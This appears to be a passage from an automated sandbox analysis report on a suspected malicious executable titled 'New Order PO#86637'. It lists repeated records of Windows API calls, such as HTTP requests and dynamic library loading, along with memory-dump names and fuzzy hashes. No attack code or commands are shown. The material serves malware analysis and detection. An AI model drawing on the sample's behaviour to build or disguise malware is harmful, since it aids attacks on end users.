                                                                            • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                            • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                            • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                            • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                              • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3705125965-3916222277
                                                                            • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                            • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                            • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                            • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                            • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                            • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Delete$InfoItem
                                                                            • String ID: 0
                                                                            • API String ID: 135850232-4108050209
                                                                            • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                            • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                            • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                            • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                            APIs
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long
                                                                            • String ID: SysTreeView32
                                                                            • API String ID: 847901565-1698111956
                                                                            • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                            • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                            • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                            • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                            • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                            • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: Library$AddressFreeLoadProc
                                                                            • String ID: AU3_GetPluginDetails
                                                                            • API String ID: 145871493-4132174516
                                                                            • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                            • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                            • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                            • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                            • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                            • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                            • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                            APIs
                                                                            • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 3375834691-2298589950
                                                                            • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                            • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                            • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                            • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove
                                                                            • String ID: $<
                                                                            • API String ID: 4104443479-428540627
                                                                            • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                            • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                            • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                            • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID: \VH
                                                                            • API String ID: 1682464887-234962358
                                                                            • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                            • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                            • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                            • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID: \VH
                                                                            • API String ID: 1682464887-234962358
                                                                            • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                            • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                            • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                            • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DiskFreeSpace
                                                                            • String ID: \VH
                                                                            • API String ID: 1682464887-234962358
                                                                            • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                            • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                            • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                            • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: \VH
                                                                            • API String ID: 2507767853-234962358
                                                                            • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                            • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                            • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                            • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$InformationVolume
                                                                            • String ID: \VH
                                                                            • API String ID: 2507767853-234962358
                                                                            • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                            • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                            • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                            • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                            • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend
                                                                            • String ID: msctls_trackbar32
                                                                            • API String ID: 3850602802-1010561917
                                                                            • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                            • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                            • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                            • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                            APIs
                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                            • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                            • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                            • String ID: crts
                                                                            • API String ID: 943502515-3724388283
                                                                            • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                            • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                            • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                            • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                            • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                            • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2084277614.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000000.00000002.2084254542.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084325380.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084367860.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084407519.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084457901.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2084487119.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_New Order PO#86637.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$LabelVolume
                                                                            • String ID: \VH
                                                                            • API String ID: 2006950084-234962358
                                                                            • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                            • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                            • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
